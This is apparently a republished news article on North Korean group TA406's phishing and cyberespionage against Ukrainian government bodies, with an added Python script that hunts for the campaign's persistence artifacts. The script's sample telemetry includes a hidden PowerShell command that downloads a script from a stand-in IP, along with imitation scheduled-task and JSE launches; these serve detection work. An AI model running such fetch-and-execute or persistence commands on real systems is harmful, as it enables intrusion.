North Korea’s involvement in the war in Ukraine extends beyond sending soldiers, munitions, and missiles to Russia, as cybersecurity researchers warn of recent cyberespionage campaigns against Ukrainian government entities by a known North Korean state-sponsored actor.
“Proofpoint assesses TA406 is targeting Ukrainian government entities to better understand the appetite to continue fighting against the Russian invasion and assess the medium-term outlook of the conflict,” researchers from cybersecurity firm Proofpoint wrote in a report this week.
TA406, also known in the security industry as Konni, Opal Sleet, and OSMIUM, has been active since at least 2014 and, ironically, has historically been tasked with targeting Russia, as well as South Korea. For example, in January 2022 Konni targeted Russian diplomats with phishing emails masquerading as New Year greetings.
In a new report that analyzes North Korea’s cyber capabilities, groups, and tradecraft, researchers from insider risk management firm DTEX Systems attribute Konni to the Reconnaissance General Bureau of the North Korean Army’s General Staff Department, along with APT43 and APT45. The group is known primarily for its custom Konni RAT that can capture keystrokes, take screenshots, and exfiltrate data.
Impersonating think tank analysts
The latest campaign against government targets in Ukraine began in February and involved emails from a fictitious person claiming to be a senior fellow with a think tank called the Royal Institute of Strategic Studies, an entity that doesn’t exist.
The email contained a link to what was supposed to be an analysis of the views of Ukrainian people and major politicians about the targeted political group. The link led to a password-protected RAR archive hosted on the Mega file hosting service. The password was included in the email.
If the target didn't click on the link, the attackers followed up over multiple days with additional emails asking whether the recipient had read the previous messages, a tactic meant to pressure the victim into acting.
The RAR archive contained a Microsoft Compiled HTML Help (CHM) file that included multiple poisoned HTML files with information about Valeriy Zaluzhnyi, the former commander-in-chief of the Ukrainian Armed Forces.
When the CHM file is opened and its HTML page is clicked, the page downloads a PowerShell script that gathers information about the system and sends it back to an attacker-controlled server.
The PowerShell script also saves the code from the HTML file to a file called state.bat that is copied to the system’s autorun folder to achieve persistence and execute after every reboot.
A variation of this attack included a ZIP attachment in the phishing email instead of a link. The ZIP archive contained a PDF and a LNK (Windows shortcut) file called “Why Zelenskyy fired Zaluzhnyi.” When opened, the LNK file executed PowerShell code that created a Windows scheduled task named Windows Themes Update.
The code also drops a JavaScript Encoded (JSE) file that gets executed by the new scheduled task. This file checks an attacker-controlled server for additional PowerShell code to execute.
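The host-side artifacts described above (a state.bat in the autorun folder, a scheduled task named Windows Themes Update, and a JSE file run by that task) are concrete enough to hunt for. The following Python script is an added example, not code from Proofpoint or the article: it encodes those indicators as rules and runs them over constructed, simplified JSON-lines telemetry that only mimics the fields an EDR or Sysmon export would carry. It assumes that the report's "autorun folder" is the user Startup folder, and it adds one heuristic the report does not name, flagging hh.exe (the Windows CHM viewer) spawning a shell. All paths, the host, and the 203.0.113.10 URL are invented for the example.

```python
"""Hunt for the TA406 persistence artifacts over constructed telemetry (added example)."""
import json
import re

# Constructed sample telemetry, one JSON object per line. Fields are a simplified
# imitation of process-creation and file-creation events; nothing here is a real export.
SAMPLE_EVENTS = r'''
{"type":"process","parent":"hh.exe","image":"powershell.exe","cmdline":"powershell.exe -w hidden -c \"iwr http://203.0.113.10/x.ps1\""}
{"type":"file","image":"powershell.exe","path":"C:\\Users\\u\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\state.bat"}
{"type":"process","parent":"powershell.exe","image":"schtasks.exe","cmdline":"schtasks /create /sc minute /mo 5 /tn \"Windows Themes Update\" /tr C:\\ProgramData\\u.jse"}
{"type":"process","parent":"svchost.exe","image":"wscript.exe","cmdline":"wscript.exe C:\\ProgramData\\u.jse"}
{"type":"process","parent":"explorer.exe","image":"winword.exe","cmdline":"winword.exe report.docx"}
{"type":"process","parent":"svchost.exe","image":"schtasks.exe","cmdline":"schtasks /create /tn \"OneDrive Update\" /tr onedrive.exe"}
'''.strip().splitlines()

# Assumption: the report's "autorun folder" is the per-user Startup folder.
STARTUP_DIR = re.compile(r"\\start menu\\programs\\startup\\", re.IGNORECASE)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}


def parse_event(line):
    """Return the event dict, or None for blank or malformed lines."""
    try:
        ev = json.loads(line)
    except json.JSONDecodeError:
        return None
    return ev if isinstance(ev, dict) else None


def rule_startup_state_bat(ev):
    """state.bat written into the Startup folder (persistence across reboots)."""
    path = ev.get("path", "")
    return (ev.get("type") == "file"
            and path.lower().endswith("state.bat")
            and STARTUP_DIR.search(path) is not None)


def rule_themes_update_task(ev):
    """A scheduled task named 'Windows Themes Update' being registered."""
    cl = ev.get("cmdline", "").lower()
    creates = "/create" in cl or "register-scheduledtask" in cl
    return ev.get("type") == "process" and creates and "windows themes update" in cl


def rule_jse_script_host(ev):
    """A script host launching a .jse (JScript Encoded) file."""
    return (ev.get("type") == "process"
            and ev.get("image", "").lower() in SCRIPT_HOSTS
            and ".jse" in ev.get("cmdline", "").lower())


def rule_chm_spawns_shell(ev):
    """Heuristic not in the report: the CHM viewer hh.exe spawning a shell."""
    return (ev.get("type") == "process"
            and ev.get("parent", "").lower() == "hh.exe"
            and ev.get("image", "").lower() in SHELLS)


RULES = {
    "startup_state_bat": rule_startup_state_bat,
    "themes_update_task": rule_themes_update_task,
    "jse_script_host": rule_jse_script_host,
    "chm_spawns_shell": rule_chm_spawns_shell,
}


def hunt(lines):
    """Return (rule_name, event) pairs for every event that trips a rule."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        for name, rule in RULES.items():
            if rule(ev):
                hits.append((name, ev))
    return hits


def matched_rule_names(lines):
    """Sorted, de-duplicated names of the rules that fired."""
    return sorted({name for name, _ in hunt(lines)})


if __name__ == "__main__":
    for name, ev in hunt(SAMPLE_EVENTS):
        print(f"[{name}] {ev.get('image')}: {ev.get('cmdline') or ev.get('path')}")
```

Run against the constructed sample, the four malicious records each trip exactly one rule while the Word launch and the unrelated schtasks call stay quiet. The task-name and file-name rules are deliberately narrow (they match this campaign's strings), whereas the script-host and hh.exe rules are broader and will need tuning against a given environment's baseline.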
Credential harvesting
Before the phishing emails, the same Ukrainian government entities were targeted with email alerts impersonating Microsoft and claiming unusual sign-in activity was detected on their accounts. The victims were asked to perform identity verification by clicking on a button, which took them to credential harvesting pages.
The Proofpoint researchers didn’t manage to obtain any of these pages for analysis, but the same domain had been flagged in the past for Naver credential harvesting, which aligns with past TA406 activity.
“North Korea committed troops to assist Russia in the fall of 2024, and TA406 is very likely gathering intelligence to help North Korean leadership determine the current risk to its forces already in the theatre, as well as the likelihood that Russia will request more troops or armaments,” the Proofpoint researchers said.
Originally published as “After helping Russia on the ground North Korea targets Ukraine with cyberespionage” at CSO Online.